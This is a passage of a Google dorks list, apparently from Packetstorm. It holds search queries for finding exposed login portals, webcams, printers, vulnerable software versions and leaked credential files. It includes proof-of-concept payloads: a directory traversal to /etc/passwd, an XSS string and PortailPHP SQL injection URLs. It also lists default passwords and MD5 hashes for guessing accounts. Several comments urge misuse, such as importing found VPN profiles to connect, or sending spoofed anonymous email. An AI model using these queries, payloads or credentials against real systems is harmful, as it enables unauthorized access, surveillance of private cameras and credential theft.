searches for "Active Webcam" feedson websites, a popular USB webcaminterface.

"powered byCubeCart 2.0" "powered by CubeCart 2.0"

This search reveals an alarmingnumber of servers running versions ofBrooky CubeCart that are reported tobe prone to multiple vulnerabilities dueto insufficient sanitization of user-supplied data....susceptible to a remotedirectory traversal vulnerability...cross-site scripting vulnerability may allow

Page 161: Packetstorm Google Dorks List

for theft of cookie-based authenticationcredentials or other attacks.An exploitis not required.The following proof ofconcept examples areavailable:http://www.example.com/index.php?&language=../../../../../../../../etc/passwdhttp://www.example.com/index.php?&language=var%20test_variable=31337;alert(test_variable);Vulnerability was published 2-14-2005http://www.securityfocus.com/bid/12549/

filetype:oratnsnames filetype:ora tnsnames

This searches for tns names files. Thisis an Oracle configuration file that setsup connection strings for someone'sOracle client to contact the variousdatabases it is managing. This filecontains ports, IP's and server names ofthese database machines. What I thinkis more telling is that in most cases,this file is stored in Oracle's installationdirectory which can probably be moretelling.

intitle:"BelarcAdvisor CurrentProfile"intext:"Click herefor Belarc's PCManagementproducts, for largeand smallcompanies."

intitle:"Belarc Advisor CurrentProfile" intext:"Click here forBelarc's PC Management products,for large and small companies."

People who have foolishly publishedan audit of their machine(s) on the netwith some server info as well

intitle:"SuSELinuxOpenexchangeServer" "PleaseactivateJavaScript!"

intitle:"SuSE Linux OpenexchangeServer" "Please activateJavaScript!"

Another way to find the webadministration portal of linux openexchange servers.

inurl:"suse/login.pl" inurl:"suse/login.pl" More Suse login portals, mostly Open

Exchange.intitle:HomeSeer.Web.Control |Home.Status.Events.Log

intitle:HomeSeer.Web.Control |Home.Status.Events.Log

HomeSeer(http://www.homeseer.com/) providesa well known home automationsolution (software + hardware)This

Page 162: Packetstorm Google Dorks List

dork will find web interfaces ofhomeseer.

Powered.by.RaidenHTTPDintitle:index.of

Powered.by.RaidenHTTPDintitle:index.of

RaidenHTTPD (http://www.raidenhttpd.com/en ) is afull featured web server software forWindows

filetype:iniDesktop.iniintext:mydocs.dll

filetype:iniDesktop.iniintext:mydocs.dll

This dork finds any websharedwindows folder inside my docs. Youcan change the end bit"intext:mydocs.dll" by looking insideany of your your own folders on yourpc, looking for the desktop.ini file andadd some of the information to thequery. For Anouther example - ShellFolders (Favourite etc) filetype:iniDesktop.iniintext:shell32.dllEnjoy

"#mysql dump"filetype:sql21232f297a57a5a743894a0e4a801fc3

"#mysql dump" filetype:sql21232f297a57a5a743894a0e4a801fc3

this is a mod of one of the previousqueries posted in here. the basic thingis, to addthis:21232f297a57a5a743894a0e4a801fc3to your query, that oryginally resultsin a username lists with a MD5encrypted password.this one findsmysql dumps with for a users who'spasswordsare "admin" :)the"21232f297a57a5a743894a0e4a801fc3" is md5 result for "admin"you can tryit with other queris on this site.usealso:63a9f0ea7bb98050796b649e85481845 forroot098f6bcd4621d373cade4e832627b4f6 fortest3c3662bcb661d6de679c636744c66b62 forsexf561aaf6ef0bf14d4208bb46a4ccb3ad for xxxif you'll get lucky, you'll get ausername, and a encryoted password,witch is the one above that uused.remember, that this works for allfiles that contain plaintex username andmd5 encrypted passwords. use thistechniq with other queris that you'llfind hereuff... i hope i made my selfclear.

allinurl:wps/portal/ allinurl:wps/portal/ login Login to IBM WebSphere Portal.You

Page 163: Packetstorm Google Dorks List

login may find portals using standardadministrator user/password whichgave you complete access to theapplication itself.

intitle:asterisk.management.portalweb-access

intitle:asterisk.management.portalweb-access

Coalescent Systems Inc. launched TheAsterisk Management Portal project tobring together best-of-breedapplications to produce a "canned" (butfully functional) turn-key smallbusiness phone system based on TheAsterisk Open Source PBX.

intitle:"FlashOperator Panel" -ext:php -wiki -cms-inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists

intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists

Flash Operator Panel is a switchboardtype application for the Asterisk PBX.It runs on a web browser with the flashplugin. It is able to display informationabout your PBX activity in real time.

ext:txtinurl:unattend.txt ext:txt inurl:unattend.txt

the unattend.txt is used to driveunanttended MS Windowsinstallations. The files contain allinformation for a Windows informationincluding Administrator's passwords,IP addresses and product IDs.

filetype:infsysprep filetype:inf sysprep

sysprep is used to drive unanttendedMS Windows installations. The filescontain all information for a Windowsinformation including Administrator'spasswords, IP addresses and productIDs.

intitle:"ServiceManaged GatewayLogin"

intitle:"Service Managed GatewayLogin"

service Managed Gateway fromVirtualAccess login page

"Powered byUebiMiau" -site:sourceforge.net

"Powered by UebiMiau" -site:sourceforge.net

UebiMiau is a simple, yet efficientcross-plataform POP3/IMAP mailreader written in PHP. It's have somemany features, such as: Folders, Viewand Send Attachments, Preferences,Search, Quota Limit

inurl:webmail./index.pl "Interface" inurl:webmail./index.pl "Interface" Webmail system which reveals that the

website is hosted by vDeckintitle:"BorderWare MXtreme Mail

intitle:"BorderWare MXtreme MailFirewall Login"

BorderWare MXtreme MailfirewallMXtreme is a hardened

Page 164: Packetstorm Google Dorks List

Firewall Login" appliance with a highly robust mailtransfer agent (MTA) and emailgateway that prevents email-bornethreats from entering your networkwhile protecting against spam andviruses.

intitle:"actiontec"main setup status"Copyright 2001ActiontecElectronics Inc"

intitle:"actiontec" main setup status"Copyright 2001 ActiontecElectronics Inc"

Actiontec Routers.

Powered.by:.vBulletin.Version...3.0.6

Powered.by:.vBulletin.Version...3.0.6

vBulletin is reported prone to anarbitrary PHP script code executionvulnerability. The issue is reported toexist due to a lack of sufficient inputsanitization performed on user-supplieddata before this data is included in adynamically generatedscripthttp://www.securityfocus.com/bid/12622/info/

intitle:"VMwareManagementInterface:"inurl:"vmware/en/"

intitle:"VMware ManagementInterface:" inurl:"vmware/en/"

VMware GSX Server is enterprise-class virtual infrastructure software forx86-based servers. It is ideal for serverconsolidation, disaster recovery andstreamlining software developmentprocesses.

filetype:phpintitle:"paNewsv2.0b4"

filetype:php intitle:"paNewsv2.0b4"

PaNews is reported prone to a remotePHP script code executionvulnerability. It is reported that PHPscript code may be injected into thePaNews software through the'showcopy' parameter of the'admin_setup.php' script.http://www.securityfocus.com/bid/12611

"Webthru UserLogin" "Webthru User Login" samsung webthru cameras

ext:cgiintitle:"controlpanel" "enter yourowner password tocontinue!"

ext:cgi intitle:"control panel" "enteryour owner password to continue!"

Free Perl Guestbook (FPG)administration page. Only a passwordis needed to logon.

intitle:"ListMailLogin" admin -

intitle:"ListMail Login" admin -demo

Listmail mailinglist manager adminlogon

Page 165: Packetstorm Google Dorks List

demointitle:"Test Pagefor the ApacheHTTP Server onFedora Core"intext:"FedoraCore Test Page"

intitle:"Test Page for the ApacheHTTP Server on Fedora Core"intext:"Fedora Core Test Page"

Apache 2.0 on Fedore Core Test page

"Powered by:vBulletin Version1.1.5"

"Powered by: vBulletin Version1.1.5"

This google dork reveals vulnerablemessage boards. It works for allVbulletin version up to 2.0 beta 2. Totry for other versions just change theversion number in the dork.Thesevulnerable message boards allowremote code execution.More on thiscan be foundhere:http://www.securiteam.com/securitynews/5IP0B203PI.htmlit has a fairlygood explanation of the exploitsincorporated with these versions.

wwwboardWebAdmininurl:passwd.txtwwwboard|webadmin

wwwboard WebAdmininurl:passwd.txtwwwboard|webadmin

This is a filtered version of previous'inurl:passwd' searches, focusing onWWWBoard [1]. There are differentcrypt functions involved [2], but thedefault username and password is'WebAdmin:WebBoard' without thequotes. This is my first Googledorkentry, so be gentle :)Funny enough,many of the DES hashes seem to use asalt of "ae". I tried just using this stringalong with the inurl portion, but itseemed to inappropriately restrict thesearch. Couple this with [3] and, um,yeah.cykyc[1]http://www.scriptarchive.com/wwwboard.html[2]http://www.scriptarchive.com/faq/wwwboard.html#q2[3]http://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=625

intitle:asterisk.management.portalweb-access

intitle:asterisk.management.portalweb-access

VOXBOX Asterisk web management.Allows to manage Asteriskconfiguration like calls and SIPsettings.

intitle:index.of/maildir/new/ intitle:index.of /maildir/new/ search gives you a mailbox dir.

Contains a lot of mails.

Page 166: Packetstorm Google Dorks List

intitle:"FlashOperator Panel" -ext:php -wiki -cms-inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists

intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists

Flash Operator Panel is a switchboardtype application for the Asterisk PBX.It runs on a web browser with the flashplugin. It is able to display informationabout your PBX activity in real time.

"Powered byCoppermine PhotoGallery" ( "v1.2.2b" | "v1.2.1" |"v1.2" | "v1.1" |"v1.0")

"Powered by Coppermine PhotoGallery" ( "v1.2.2 b" | "v1.2.1" |"v1.2" | "v1.1" | "v1.0")

Reportedly Coppermine Photo Galleryis prone to multiple input validationvulnerabilities, some of which maylead to arbitrary command execution.These issues are due to the applicationfailing to properly sanitize and validateuser-supplied input prior to using it indynamic content and system commandexecution function calls.These issuesmay be exploited to steal cookie basedauthentication credentials, map theapplication root directory of theaffected application, execute arbitrarycommands and include arbitrary files.Other attacks are alsopossible.http://www.securityfocus.com/bid/10253/

WebLog Referrers allinurl:"weblog/referrers"

ExpressionEngine is a modular,flexible, feature-packed web publishingsystem that adapts to a broad range ofneeds.

inurl:bin.welcome.sh |inurl:bin.welcome.bat |intitle:eHealth.5.0

inurl:bin.welcome.sh |inurl:bin.welcome.bat |intitle:eHealth.5.0

eHealth, a network managementsolution, enables its users to manageperformance and availability of LANs,WANs, routers, Switches, FrameRelay, ATM, Remote AccessEquipment, QoS, Wireless LAN, DAL,Voice and Cable technologies.

yaws.*.server.at yaws.*.server.at

YAWS (http://yaws.hyber.org), YetAnother Web Server, is a HTTP highperfomance 1.1 webserver. Yaws isentirely written in Erlang, furthermoreit is a multithreaded webserver whereone Erlang light weight process is usedto handle each client.

intitle:"IPC@CHIP Infopage" intitle:"IPC@CHIP Infopage" web server detection for IPC@chip

embedded webserverThe dork uses the

Page 167: Packetstorm Google Dorks List

webserver's infopage which revealssome very interesting information.Seesecurityfocus advisory for more info:http://www.securityfocus.com/bid/2767

thttpd webserver intitle:"Index of *" mode links byteslast-changed name

thttpd is is a webserver written in Cand should compile and run on mostunix-like systems. As of version 2.20or later, thttpd is known to build andrun on the following platforms, usuallyon at least recent platform versions: *FreeBSD* NetBSD* BSD/OS*Solaris* Tru64 / DIGITAL UNIX /OSF/1* SunOS* Linux* HP-UX*MacOS X* UnixWare* AMIGAOS*NCR MP-RAS BASE 3.02(EISA/MCA)* Sega Dreamcast*Compaq iPaq 3765* Windows2000/XP (port of 2.07 only)

intitle:"OfficeConnect Wireless 11gAccess Point""Checking yourbrowser"

intitle:"OfficeConnect Wireless 11gAccess Point" "Checking yourbrowser"

OfficeConnect Wireless 11g AccessPoint

powered.by.instaBoard.version.1.3 powered.by.instaBoard.version.1.3

InstaBoard is a coldfusion forumsolution. In its version 1.3 it isvulnerable to SQL Injection.BugtraqID 7338

intitle:"Lexmark*" inurl:port_0 intitle:"Lexmark *" inurl:port_0 Lexmark printers (4 models)

inurl:/en/help.cgi"ID=*" inurl:/en/help.cgi "ID=*" Aficio printers (this search locates the

help pages)intitle:jdewshlp"Welcome to theEmbedded WebServer!"

intitle:jdewshlp "Welcome to theEmbedded Web Server!"

HP Officejet help page. Remove"help.html" for main page.

"display printerstatus"intitle:"Home"

"display printer status"intitle:"Home" Xerox Phaser printers.

inurl:JPGLogin.htm inurl:JPGLogin.htm

webserver detection forGeoHttpServer, the page is the loginpage or guest cam. Don't ask why theseare mostly doggy cams, weirdness.

Page 168: Packetstorm Google Dorks List

intitle:"Welcometo Windows SmallBusiness Server2003"

intitle:"Welcome to Windows SmallBusiness Server 2003"

Another way to find Small BusinessServer 2003, for more results check thedork by JimmyNeutron (id=763).

intitle:"OfficeConnect Cable/DSLGateway"intext:"Checkingyour browser"

intitle:"OfficeConnect Cable/DSLGateway" intext:"Checking yourbrowser"

This query allows you to findOfficeConnect Cable/DSL Gateways,by locating the browser-check pagethat Google has indexed. The browser-check page leads to a login page, whichkindly informs you of the defaultpassword.

intext:"Poweredby phpBB 2.0.13"inurl:"cal_view_month.php"|inurl:"downloads.php"

intext:"Powered by phpBB 2.0.13"inurl:"cal_view_month.php"|inurl:"downloads.php"

phpBB 2.0.13 with installed CalendarPro MOD are vulnerable to SQLinjection attacks. An attacker candownload the MD5 hashes from theaccount databse without authorization.

NetscapeApplication ServerError page

intitle:"404 SC_NOT_FOUND"

This error message highlightspotentially unpatched or misconfiguredNetscape Application Server or iPlanetapplication servers. An inquisitivemind would probably want to manuallyalter the URL's returned by this query,just to see what other, moreinformative messages might berevealed. As these servers are alreadyexhibiting a misconfiguration, thiscould lead to other vulnerabilities beingdiscovered.Finally, these servers arerunning software that is a few years oldnow. An attacker may feel that becauseof this, there's a strong possibility thatthey're not patched-up fully either,making them potentially vulnerable toknown exploits.

"SQL ServerDriver][SQLServer]Line 1:Incorrect syntaxnear"

"[SQL Server Driver][SQLServer]Line 1: Incorrect syntaxnear" -forum -thread -showthread

you can find many servers infectedwith sql injection

intext:"vbulletin"inurl:admincp intext:"vbulletin" inurl:admincp vBulletin Admin Control Panel

intitle:"inc. vpn3000 concentrator" intitle:"inc. vpn 3000 concentrator"

This search will show the login pagefor Cisco VPN 3000 concentrators.Since the default user id and password

Page 169: Packetstorm Google Dorks List

are readily available on the Ciscowebsite, an out-of-the-box or testdevice could be wide open to mischief.

Winamp WebInterface

"About Winamp Web Interface"intitle:"Winamp Web Interface"

Just a bit of fun, should reveal a fewinstances of a Winamp HTTP controlprogram. Without login, you can't domuch except see the currently playingtrack. With login you can have a bitmore fun by changing the volume,currently playing track, viewingplaylists, etc. With admin access youcan delete tracks... I'll leave it to othersto find out if anything cool can be donewith this.Just a note, you *can't* hearthe music the person is playing, it's nota stream interface, just a controlinterface.

intitle:ilohamailintext:"Version0.8.10" "Poweredby IlohaMail"

intitle:ilohamail intext:"Version0.8.10" "Powered by IlohaMail"

some version of ilohamail arevulnerable.

intitle:ilohamail"Powered byIlohaMail"

intitle:ilohamail "Powered byIlohaMail"

IlohaMail is a light-weight yet featurerich multilingual webmail systemdesigned for ease of use, written inpure PHP. It supports web-access toIMAP and POP3 accounts, andincludes a complete contacts featureand other PIM features.

intitle:"NeroNET -burning online" intitle:"NeroNET - burning online"

NeroNet is an online burning device byNero. Basically with this query you'llget a listing of active servers runningthe software. You can only do thingslike view active jobs users and the seewhat disc the server is burning on.However if you manage to log in as theAdministrator you can have a bit morefun like change the server andrecording settings. Well they weresmart enough to convienently place thedefault password located within thesoftwares manual.

"Parse error: parseerror, unexpectedT_VARIABLE"

"Parse error: parse error,unexpected T_VARIABLE" "online" filetype:php

PHP error with a full web root pathdisclosure

Page 170: Packetstorm Google Dorks List

"on line"filetype:php

"MacHTTP"filetype:loginurl:machttp.log

"MacHTTP" filetype:loginurl:machttp.log

MacHTTP is an webserver for Macsrunning OS 6-9.x. It's pretty good forolder Macs but the default installleaves the MacHTTP.log file open toaccess.

ext:ics ics ext:ics icsICalender Fileder that can contain a lotof useful information about a possibletarget.

intitle:"DefaultPLESK Page" intitle:"Default PLESK Page"

Plesk Server Administrator (PSA) isweb based software that enables remoteadministration of web servers. It can beused on Linux and other systems thatsupport PHP.The default page is anindication that no configuration hasbeen done (yet) for the domain

ext:plistfiletype:plistinurl:bookmarks.plist

ext:plist filetype:plistinurl:bookmarks.plist

These Safari bookmarks that mightshow very interesting info about auser's surfing habits

intitle:"Zope HelpSystem"inurl:HelpSys

intitle:"Zope Help System"inurl:HelpSys

By itself, this returns Zope's helppages. Manipulation of the URL,changing 'HelpSys' to 'manage', gives alink to a server's Zope ManagementInterface. While this requiresauthentication, sometimes overlyrevealing error messages are returned.

ext:jbf jbf ext:jbf jbf

There is a full path disclosure in .jbffiles (paint shop pro), which by itself isnot a vulnerability, but it becomesinteresting when uploaded or used onwebservers. Use a tool like 'strings' toread the ascii parts, the path is on thetop of the file.

"Please useNetscape 2.0 orenhance !!" -site:dlink.com -site:ovislink.com.tw

"Please use Netscape 2.0 or enhance!!" -site:dlink.com -site:ovislink.com.tw

A search for some HTML code used ina variety of D-link network devices(webcams and such).

intitle:"Welcometo the Advanced

intitle:"Welcome to the AdvancedExtranet Server, ADVX!"

Webserver detection: The AdvancedExtranet Server project aims to create

Page 171: Packetstorm Google Dorks List

Extranet Server,ADVX!"

an extensible open source web serverbased on Apache.

inurl:cgi-bininurl:bigate.cgi inurl:cgi-bin inurl:bigate.cgi

Anonymous surfing with bigate.cgi.Remove http:// when you copy paste orit won't work.

ext:dhtmlintitle:"documentcentre|(home)" ORintitle:"xerox"

ext:dhtml intitle:"documentcentre|(home)" OR intitle:"xerox"

Various Online Devices>Xerox(*Centre)

ext:DBF DBF ext:DBF DBF Dbase DAtabase file. Can containsensitive data like any other database.

ext:CDX CDX ext:CDX CDX Visual FoxPro database indexext:ccm ccm -catacomb ext:ccm ccm -catacomb Lotus cc:Mail Mailbox file

ext:DCA DCA ext:DCA DCA IBM DisplayWrite Document ContentArchitecture Text File

intitle:"ERROR:The requestedURL could not beretrieved" "Whiletrying to retrievethe URL" "Thefollowing errorwas encountered:"

intitle:"ERROR: The requestedURL could not be retrieved" "Whiletrying to retrieve the URL" "Thefollowing error was encountered:"

squid error messages, most likely fromreverse proxy servers.

!Host=*.*intext:enc_UserPassword=* ext:pcf

!Host=*.*intext:enc_UserPassword=* ext:pcf

some people actually keep their VPNprofiles on the internet...omg... Simplydonwload the pcf file, import it in yourCisco VPN client and try to connect

intitle:"WelcomeTo YourWebSTAR HomePage"

intitle:"Welcome To YourWebSTAR Home Page"

This is the default page for theWebSTAR (Macintosh) web server(Headers say --> Server: WebSTARNetCloak).

inurl:gnatsweb.pl inurl:gnatsweb.pl

GNU GNATS is a set of tools fortracking bugs reported by users to acentral site. It allows problem reportmanagement and communication withusers via various means. GNATSstores all the information aboutproblem reports in its databases andprovides tools for querying, editing,and maintenance of the databases.

intitle:"site intitle:"site administration: please Real Estate software package, with the

Page 172: Packetstorm Google Dorks List

administration:please log in" "sitedesigned byemarketsouth"

log in" "site designed byemarketsouth"

admin login screen

intitle:"YALA:Yet AnotherLDAPAdministrator"

intitle:"YALA: Yet Another LDAPAdministrator"

YALA is a web-based LDAPadministration GUI. The idea is tosimplify the directory administrationwith a graphical interface and neatfeatures, though to stay a general-purpose programThe goal is to simplifythe administration but not to make theYALA user stupid: to achieve this, wetry to show the user what YALA doesbehind the scenes, what it sends to theserver

intitle:open-xchangeinurl:login.pl

intitle:open-xchange inurl:login.pl

Open-Xchange 5 is a high performancesubstitute for costly and inflexibleMicrosoft Exchange deployments --with the full functionality of a maturecollaboration platform. OX 5 will notonly manage appointments and tasks, itwill take care of email, calendar,contacts, to do's, projects, documents,search and forums. With OX, you canmanage information using bookmarksthat are linked to a wide variety of dataobjects, such as emails, spreadsheetsand/or presentations. Open-XchangeT5 allows you to connect to MicrosoftOutlook and devices using the PalmOS. Based on proven open sourcetechnologies, OX 5 offers best-of-classsecurity through anti-virus and anti-spam utilities.

intitle:"Documenttitle goes here"intitle:"used byweb search tools"" example of asimple HomePage"

intitle:"Document title goes here"intitle:"used by web search tools" "example of a simple Home Page"

IBM Http Server (AS/400)

intitle:"Freifunk.Net - Status" -site:commando.de

intitle:"Freifunk.Net - Status" -site:commando.de

Hacked WRT54G Freifunk firmware.The router is based on Linux so afterthe GPL the source code must bepublished. some guys from freifunk.net

Page 173: Packetstorm Google Dorks List

have modified it for their needs.

intitle:index.ofWEB-INF intitle:index.of WEB-INF

Finds java powered web servers whichhave indexing enabled on their configdirectory

inurl:"port_255" -htm inurl:"port_255" -htm

Another way to dig up some not yetdorked Lexmark and a couple of Dellprinters.http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=2177

intitle:"SWW link""Please wait....." intitle:"SWW link" "Please wait....." Zyxel Zywall

intitle:"InterJakWeb Manager" intitle:"InterJak Web Manager"

A router device by Uroam (formerlyFilaNet), with email and VPNpossibilities.

inurl:server.cfgrcon password inurl:server.cfg rcon password Counter strike rcon passwords, saved

in the server.cfg.

intitle:"myBloggie2.1.1..2 - bymyWebland"

intitle:"myBloggie 2.1.1..2 - bymyWebland"

myBloggie is affected by multiplevulnerabilities.http://www.securityfocus.com/bid/13507

intext:"powered byEZGuestbook" intext:"powered by EZGuestbook"

HTMLJunction EZGuestbook is proneto a database disclosure vulnerability.Remote users may download thedatabasehttp://www.securityfocus.com/bid/13543/info/

inurl::2082/frontend -demo inurl::2082/frontend -demo This allows you access to CPanel login

dialogues/screens.

intitle:"osTicket ::Support TicketSystem"

intitle:"osTicket :: Support TicketSystem"

osTicket is a widely-used open sourcesupport ticket system. It is alightweight support ticket tool writtenmainly using PHP scripting language.There are several vulnerabilities in theosTicket software that may allow foran attacker to take control of theaffected web server, disclose sensitivedata from the database, or readarbitrary files. These issues have beenreported to the developers and a newupdated version of osTicket is availablefor download. All affected users shouldupgrade their osTicket installationsimmediately.http://www.addict3d.org/i

Page 174: Packetstorm Google Dorks List

ndex.php?page=viewarticle&type=security&ID=3882

intext:"Poweredby: AdobePrintGear"inurl:admin

intext:"Powered by: AdobePrintGear" inurl:admin

Printers equipped with Adobe'sPrintGear technologyAdobe'sPrintGear technology is a new printingarchitecture designed specifically forlow-cost, high-quality output. At thecore of this architecture is a customchip, the PrintGear Imaging Processor(or PrintGear processor for short). Thisprocessor supplies the performancerequired for high-resolution output, yethelps keep the overall cost of theoutput device low.

intitle:"--- VIDEOWEB SERVER ---" intext:"VideoWeb Server" "Anytime & Anywhere" usernamepassword

intitle:"--- VIDEO WEB SERVER ---" intext:"Video Web Server" "Anytime & Any where" usernamepassword

AVTech Video Web Server is asurveillance producted that is directlyconnected to the internet It couldenable the AVTech DVR seriesproducts or any camera to connect toInternet for remote monitoring orremote control. Besides, it could alsoenable 2 video input to connect toInternet for remote monitoring andrecording. Besides the web interface italso offers an ftp server.

inurl:start.htm?scrw= inurl:start.htm?scrw=

VPON (Video Picture On Net) is avideo surveillance setup which seemsto be used by a lot of businesses. In theFAQ posted on their site(http://www.aegismicro.com/navigation/indexsuppfaq.htm) they show adefault username/password ofwebmonitor/oyo.=)

intitle:"Welcometo 602LAN SUITE*"

intitle:"Welcome to 602LANSUITE *"

The 602LAN SUITE runs on awebserver called WEB602/1.04 andincludes webmail.

inurl:sphpblogintext:"Poweredby Simple PHPBlog 0.4.0"

inurl:sphpblog intext:"Powered bySimple PHP Blog 0.4.0"

simple PHP Blog is vulnerable tomutipleattacks:Vulnerabilities:~~~~~~~~~~~~~~~~A. Full Path disclosuresB. XSS insearch.phpC. Critical Informationdislosureshttp://www.securityfocus.com/archive/1/395994

Page 175: Packetstorm Google Dorks List

intitle:"SSHVncApplet"ORintitle:"SSHTermApplet" -uni-klu.ac.at -net/viewcvs.py -iphoting.iphoting.com

intitle:"SSHVnc Applet"ORintitle:"SSHTerm Applet"

sSHTerm Applet en SSHVnc Appletpages.

"To view the Webinterface of theSpeedTouch,JavaScript must besupported andenabled on yourbrowser!" -site:webblernet.nl-site:ihackstuff.com-sit

"To view the Web interface of theSpeedTouch, Java

speedtouch 510 DSL modem devicesthat were once unprotected. That mayhave changed by now.

(intitle:"502 ProxyError")|(intitle:"503 Proxy Error")"The proxy servercould not handlethe request" -topic-mail -4suite -list -site:geocrawler.co

(intitle:"502 ProxyError")|(intitle:"503 Proxy Error")"The proxy server could not handlethe request" -topic -mail -4suite -list-site:geocrawler.co

A reverse proxy is a gateway forservers, and enables one web server toprovide content from anothertransparently. These are oftenimplemented to improve security orperformance.

intitle:"Dell *"inurl:port_0 intitle:"Dell *" inurl:port_0

oA few Online Dell Printers, status,paper, toner levels, ips macs, the usual..(Lexmark and Dell seem to share thesame embedded webserver it seems, trychanging the vendor name.)

intext:"powered byHostingController"intitle:Hosting.Controller

intext:"powered by HostingController"intitle:Hosting.Controller

Description:==============Hosting Controller is a complete array of Webhosting automation tools for theWindows Server family platform. It isthe only multilingual software packageyou need to put your Web hostingbusiness on autopilot.The HC has itsown complete billing solution which istightly integrated within Control Panel& does all the invoicing &billing.Vuln:======A remoteauthenticated user can invoke'resellerdefaults.asp' to view reseller

Page 176: Packetstorm Google Dorks List

add-on plans and then load thefollowing type of URL to view thedetails of a target reseller's plans:The'resellerresources.asp' script does notproperly validate user-supplied input inthe 'resourceid' parameter. A remoteauthenticated user can supply speciallycrafted parameter values to executeSQL commands on the underlyingdatabase. This can be exploited, forexample, to delete a reseller add-onplan.More onVuln/Exploit====================http://securitytracker.com/alerts/2005/May/1014071.html

intitle:"PacketShaper CustomerLogin"

intitle:"PacketShaper CustomerLogin"

PacketShaper Login.Provides loginaccess for PacketShaper Customers.

(intitle:"PacketShaperLogin")|(intitle:"PacketShaperCustomer Login")

( intitle:"PacketShaperLogin")|(intitle:"PacketShaperCustomer Login")

Packeteer's PacketShaper is anapplication traffic management systemthat monitors, controls, and acceleratesapplication performance over the WANInternet.

inurl:Citrix/MetaFrame/default/default.aspx

inurl:Citrix/MetaFrame/default/default.aspx MetaFrame Presentation Server

inurl:exchweb/bin/auth/owalogon.asp

inurl:exchweb/bin/auth/owalogon.asp Outlook Web Access Login POrtal

inurl:/SUSAdminintitle:"MicrosoftSoftware UpdateServices"

inurl:/SUSAdmin intitle:"MicrosoftSoftware Update Services"

Microsoft SUS Server is a PatchManagement Tool for Windows 2000,XP and 2003 systems.It can be used togain access to a Patch Deploymentserver. If you successfully login to thatserver you can possibly compromise allthe other network servers.

intitle:"NetopiaRouter (*.)""toview this site"

intitle:"Netopia Router (*.)""toview this site"

Web admin for netopia routersThisWeb tool provides access toinformation about the current status ofyour router and connections.

intitle:"VisNeticWebMail"inurl:"/mail/"

intitle:"VisNetic WebMail"inurl:"/mail/"

VisNetic WebMail is a built-in webmail server that allows VisNetic MailServer account holders to access theiremail messages, folders and address

Page 177: Packetstorm Google Dorks List

books from any standard web browseron an Internet enabled computer.

inurl:perform.inifiletype:ini inurl:perform.ini filetype:ini

mIRC Passwords For Nicks &Channels in channel\[chanfolder]section of mirc.ini you can find 2 typeof "private" information - secretchannels (that is +ps is not listedeverythere) and password protectedchannels - passwords stored inplaintext)

(cam1java)|(cam2java)|(cam3java)|(cam4java)|(cam5java)|(cam6java) -navy.mil -backflip-power.ne.jp

(cam1java)|(cam2java)|(cam3java)|(cam4java)|(cam5java)|(cam6java) -navy.mil -backflip -power.ne.jp

Kpix Java Based Traffic Cameras.Based at CBS broadcasting for SanFransisco, Oakland, and San Jose.

allintitle:"Welcome to the Cyclades"

allintitle:"Welcome to theCyclades"

This search reveals the login page forthe Cyclades TS1000 and TS2000 WebManagement Service. The CycladesTS1000 and TS200 devices areConsole servers, based on a cut downLinux version. These lovely devices siton the network with console cablesattached to them, so that you then gainaccess to this device, and then haveconsole access to any of the hostsconnected to the console ports. :-)Thedefault username and password forthese devices is, root/tslinux.This querycurrently only returns pages availablein Google's cache (but in the futuremore devices may be returned).

intitle:"XcAuctionLite" | "DRIVENBY XCENT" Liteinurl:admin

intitle:"XcAuctionLite" | "DRIVENBY XCENT" Lite inurl:admin

This query reveals login pages for theadministration of XcAuction andXcClassified Lite.."XcAuction is apowerful and complete auction packagethat allows you to add auctioncapabilities to any website.""XcClassified allows you to offerfree or fee based classified ads to yoursite visitors. It integrates easily intoyour existing web site design andoffers many features."

intext:"Powered intext:"Powered by X-Cart: X-Cart (version 4.0.8) has multiple

Page 178: Packetstorm Google Dorks List

by X-Cart:shopping cartsoftware" -site:x-cart.com

shopping cart software" -site:x-cart.com

input validation vulnerabilities. Theredoesn't seem to be any way to searchfor specific versions of the softwarewith Google. Seehttp://www.securitytracker.com/alerts/2005/May/1014077.html for moreinformation.

intitle:"PHPstat"intext:"Browser"intext:"PHPstatsetup"

intitle:"PHPstat" intext:"Browser"intext:"PHPstat setup"

Phpstat shows nice statisticalinformatino about a website's visitors.Certain versions are also containvulnerabilities:http://www.soulblack.com.ar/repo/papers/advisory/PhpStat_advisory.txt

"portailphp v1.3"inurl:"index.php?affiche"inurl:"PortailPHP"-site:safari-msi.com

"portailphp v1.3"inurl:"index.php?affiche"inurl:"PortailPHP" -site:safari-msi.com

Vulnerability has been found inparameter "id". If this variableAnyvalue it is possible to replace it with asign ' is transferredSince this parameteris involved in all modules, all ofthemAre vulnerable.It occurs becauseof absence of a filtration of parameterid.Exampleshttp://example/index.php?affiche=News&id='[SQLinj]http://example/index.php?affiche=File&id='[SQLinj]http://example/index.php?affiche=Liens&id='[SQLinj]http://example/index.php?affiche=Faq&id='[SQL inj]TheconclusionVulnerability is found out inversion 1.3, on other versionsDid notcheck. Probably they too arevulnerable.

+intext:"poweredbyMyBulletinBoard"

+intext:"powered byMyBulletinBoard"

MyBB is a powerful, efficient and freeforum package developed in PHP andMySQL. There is an SQL InjectionExploit available for MyBulletinBoard(MyBB)

inurl:"S=320x240"|inurl:"S=160x120"inurl:"Q=Mobile"

inurl:"S=320x240" |inurl:"S=160x120" inurl:"Q=Mob

Mobile cameras? Not sure what cameratype this is for but they are all fromAsia and no password is required toview them.. multiple cams and cameraviews. The &N=* at the end of theURL changes the language of thecamera control links, &N=0 isenglish.This is a slightly modified

Page 179: Packetstorm Google Dorks List

version of WarChylde's query, whichgives more results.

inurl:XcCDONTS.asp inurl:XcCDONTS.asp

This query reveals an .asp script whichcan often be used to send anonymousemails from fake senders. Whencombined with a proxy, the usefulnessof these scripts is obvious!

intext:"SteamUserPassphrase="intext:"SteamAppUser=" -"username" -"user"

intext:"SteamUserPassphrase="intext:"SteamAppUser=" -"username" -"user"

This will search for usernames andpasswords for steam(www.steampowered.com) taken fromthe SteamApp.cfg file.

inurl:"CgiStart?page=" inurl:"CgiStart?page=" This search reveals even more

Panasonic IP cameras!

intext:"Poweredby flatnuke-2.5.3"+"Get RSS News"-demo

